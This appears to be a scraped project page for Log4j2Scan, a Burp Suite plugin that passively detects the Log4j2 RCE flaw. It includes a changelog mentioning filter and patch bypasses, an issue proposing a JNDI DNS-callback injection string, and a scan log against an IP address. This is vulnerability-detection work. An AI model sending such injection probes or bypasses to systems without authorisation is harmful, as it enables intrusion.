Log4j2Scan - Log4j2 RCE Passive Scanner plugin for BurpSuite

Related tags

Spring Boot Log4j2Scan
Overview

Log4j2Scan

This tool is only for learning, research and self-examination. It should not be used for illegal purposes. All risks arising from the use of this tool have nothing to do with me!

dnslog.cn is unable to access the interface from time to time due to the number of requests. If you are unable to scan, please try change dnslog platform from UI.

English | 简体中文

Log4j2 Remote Code Execution Vulnerability, Passive Scan Plugin for BurpSuite.

Support accurate hint vulnerability parameters, vulnerability location, support multi-dnslog platform extension, automatic ignore static files.

Vulnerability detection only supports the following types for now

  • Url
  • Cookie
  • Header
  • Body(x-www-form-urlencoded, json, xml, multipart)

Build

Maven and JDK 11.0 or later is recommended

$ mvn package

ChangeLog

2021/12/15

v0.9
  1. add GoDnslog backend, thx for @54Pany .
  2. add fuzz setting ui.
  3. add poc setting ui.
  4. add Body(json, xml, multipart) fuzz.
  5. opt header guess-fuzz logic.

2021/12/14

v0.8.1
  1. bypass dnslog.cn filter.
v0.8
  1. add backend setting panel.
  2. add RevSuit-DNS backend.

2021/12/13

v0.7
  1. add RevSuit-RMI backend.
  2. fix domain toLowerCase by server can't match issue.

2021/12/12

v0.6
  1. add static-file ignore.
  2. add mulit poc support.
  3. add burpcollaborator dnslog backend,default use dnslog.cn.

2021/12/11

v0.5
  1. add header fuzz.
v0.4
  1. add rc1 patch bypass.

Screenshot

Acknowledgements

Some of the code in the plugin is borrowed from the following projects

https://github.com/pmiaowu/BurpShiroPassiveScan/

You might also like...

Document scanner with border detection, perspective correction and custom crop/resize

Document scanner with border detection, perspective correction and custom crop/resize

react-native-document-scanner Preview iOS Android Both Platform Use version =1.4.1 if you are using react-native 0.48+ $ yarn add https://github.com/

Nov 10, 2022

The Google code scanner API provides a complete solution for scanning codes without requiring your app to request camera permission.

Android Google Code Scanner The Google code scanner API provides a complete solution for scanning codes without requiring your app to request camera p

Nov 23, 2022

CVE-2021-2109 && Weblogic Server RCE via JNDI

CVE-2021-2109 && Weblogic Server RCE via JNDI

Description Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected

Nov 21, 2022

spring boot Fat Jar 应用文件上传漏洞到 RCE 的利用技巧

spring boot Fat Jar 应用文件上传漏洞到 RCE 的利用技巧

spring-boot-upload-file-lead-to-rce-tricks 一. 原理文章 Spring Boot Fat Jar 写文件漏洞到稳定 RCE 的探索 二. docker 漏洞环境搭建 docker pull landgrey/spring-boot-fat-jar-writ

Jan 8, 2023

CVE-2021-44228 - Apache log4j RCE quick test

Build ./build.sh Start log4j RCE Server ./start-log4j-rce-server.sh Test Run java -cp log4j-rce-1.0-SNAPSHOT-all.jar log4j Check if you get logs in ha

Feb 1, 2022

spring-cloud-function SpEL RCE, Vultarget & Poc

spring-cloud-function SpEL RCE, Vultarget & Poc

spring-cloud-function SpEL RCE Vultarget You can build it for youself. here is the source of the Vuln App Or you can use the release which built by cc

Nov 30, 2022

F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB

F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB

CVE-2022-1388 F5 BIG-IP iControl REST vulnerability RCE exploit with Java and ELF. Included Scan a single target Scan many targets Exploit with a shel

Sep 24, 2022

Apache/Alibaba Dubbo = 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Data; Affects Versions = 2.7.6 With Different Gadgets

The 0xDABB of Doom - CVE-2021-25641-Proof-of-Concept Apache/Alibaba Dubbo = 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Da

Apr 24, 2022

Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process

-- This repository has been archived -- Further development of this tool will continue at corretto/hotpatch-for-apache-log4j2. Thanks for sharing, com

Dec 23, 2021
Comments
  • 已不兼容burpsuite 2022.9.1

    已不兼容burpsuite 2022.9.1

    日志如下:

    Log4j2Scan v0.12
Log4j2Scan loaded successfully!

Scanning: http://123.58.224.8:30596/hello?payload=111
java.lang.IllegalArgumentException: method GET must not have a request body.
java.lang.IllegalArgumentException: method GET must not have a request body.
java.lang.IllegalArgumentException: method GET must not have a request body.
java.lang.IllegalArgumentException: method GET must not have a request body.
java.lang.IllegalArgumentException: method GET must not have a request body.
java.lang.IllegalArgumentException: method GET must not have a request body.
java.lang.IllegalArgumentException: method GET must not have a request body.
java.lang.IllegalArgumentException: method GET must not have a request body.
java.lang.IllegalArgumentException: method GET must not have a request body.
java.lang.IllegalArgumentException: method GET must not have a request body.
Scan complete: http://123.58.224.8:30596/hello?payload=111 - No issue found.
Scanning: http://123.58.224.8:30596/
java.lang.IllegalArgumentException: method GET must not have a request body.
java.lang.IllegalArgumentException: method GET must not have a request body.
java.lang.IllegalArgumentException: method GET must not have a request body.
java.lang.IllegalArgumentException: method GET must not have a request body.
java.lang.IllegalArgumentException: method GET must not have a request body.
Scan complete: http://123.58.224.8:30596/ - No issue found.
Log4j2Scan loaded successfully!

Log4j2Scan loaded successfully!

Scanning: http://123.58.224.8:30596/hello?payload=111
Scan complete: http://123.58.224.8:30596/hello?payload=111 - No issue found.

    已经无法正常发包,logger无发包记录。

    opened by k-fire 8
  • 在内网不出网或没有域名的情况下,建议采用${jndi:dns://xxx.xxx.xxx.xxx:port/dnsFlag.XXX}的方式来检测

    在内网不出网或没有域名的情况下,建议采用${jndi:dns://xxx.xxx.xxx.xxx:port/dnsFlag.XXX}的方式来检测

    目前的RevSuitDNS及POC9是用${jndi:dns://xxx.dnsFlag.domain}/yyy}的方式,还是依赖域名;如果改成${jndi:dns://domain/dnsFlag.XXX}的方式domain指定为ip,用dnsFlag.XXX来作为检测,可以去除域名依赖,最终exp为${jndi:dns://1.2.3.4/dnsFlag.xxx/yyy}。我小改了一下,只需要修改三行代码。

    截屏2021-12-16 15 16 21 截屏2021-12-16 15 21 31

    作者可以看看是否可行

    opened by hanc00l 6
  • 打包失败

    打包失败 

    public class Ceye implements IBackend {
    OkHttpClient client = new OkHttpClient().newBuilder().
            connectTimeout(3000, TimeUnit.SECONDS).
            callTimeout(3000, TimeUnit.SECONDS).build();
    String platformUrl = "http://api.ceye.io/";
    String rootDomain = "xxx.ceye.io";
    String token = "xxxx";

    public Log4j2Scanner(final BurpExtender newParent) {
     this.parent = newParent;
     this.helper = newParent.helpers;
     this.pocs = new IPOC[]{new POC1(), new POC2(), new POC3(), new POC4(), new POC11()};
     this.backend = new Ceye("xxx.ceye.io", "xxxx");
     if (this.backend.getState()) {
         parent.stdout.println("Log4j2Scan loaded successfully!\r\n");
     } else {
         parent.stdout.println("Backend init failed!\r\n");
     }
 }

    这样配置会导致打包失败,如果我直接在Log4j2Scanner中使用this.backend = new Ceye();可以打包,但收不到bp警告

    opened by pykiller 2
  • Dnslog init failed!

    Dnslog init failed!

    Hello!

    I've added the .jar file to my Burp Extensions extender tab and I get this following error:

    initDomain failed: www.dnslog.cn: No address associated with hostname

    opened by oppsec 2
Releases(V0.13.1)
Owner
Whwlsfb
A Pentester & Developer & Geeker
Whwlsfb
GitHub
Non intrusive log4j2 RCE vulnerability patch.

Log4j Patch Resolve the RCE vulnerability caused by JNDI lookup in log4j 2.0~2.14.1. It is licensed under the WTFPL 2.0 license, you can do anything w

Glavo 67 Dec 2, 2022
log4j2 rce、poc

Apache Log4j 2 Apache log4j2 开源日志组件远程代码执行 攻击者通过构造恶意请求,触发服务器log4j 2 日志组件的远程代码执行漏洞。漏洞无需特殊配置,经验证,最新版的补丁可以防护此问题 官方最新补丁: log4j-2.15.0-rc2 紧急处置方案 2.10 or 以上

null 86 Dec 4, 2022
A log4j2 plugin to Eclipse.

Ganymede A log4j2 log viewer plugin for Eclipse. Installation Use the Eclipse update site: Ganymede2 - https://dbusche.github.io/Ganymede2/ History Th

null 3 Dec 15, 2022
log4j2 Log4Shell CVE-2021-44228 proof of concept

Log4Shell CVE-2021-44228 proof of concept Requirement Java (JDK/JRE) 8 or later version curl exploitable Simple spring boot application that serves a

Seshu Pasam 2 Dec 21, 2021
基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1)

Log4j 2 CVE-2021-44228 测试样本应用 基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1) 可用接口 接口 请求方法 参数 vulnerable_request_get GET v=payload vulnerable_reque

Zhangzhe 3 Mar 23, 2022
log4j2-vaccine

Log4j2-Vaccine 一款用于log4j2漏洞的疫苗,基于Instrumentation机制进行RASP防护,Patch了 org.apache.logging.log4j.core.net.JndiManager的lookup方法,部分代码借用了arthas的实现 Usage1: Java

Chaitin Tech 84 Dec 2, 2022
log4j-scanner is a project derived from other members of the open-source community by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.

Log4j Scanner This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046). The

Cybersecurity and Infrastructure Security Agency 1.3k Dec 22, 2022
An open-source, free, scanner for exotic armour in Hypixel Skyblock

TheExoticsMod An open-source, free, scanner for exotic armour in Hypixel Skyblock! Searches friendslists, the auction house, and inventories to find e

null 4 Dec 26, 2022
Word wrapping program created using Java and Scanner imports.

WordWrap Word wrapping program created using Java and Scanner imports. The program begins by asking the user to input a number for line width. This re

Nikhil Khanna 1 Jan 31, 2022
BinAbsInspector: Vulnerability Scanner for Binaries

What is BinAbsInspector? BinAbsInspector (Binary Abstract Inspector) is a static analyzer for automated reverse engineering and scanning vulnerabiliti

null 1.3k Jan 4, 2023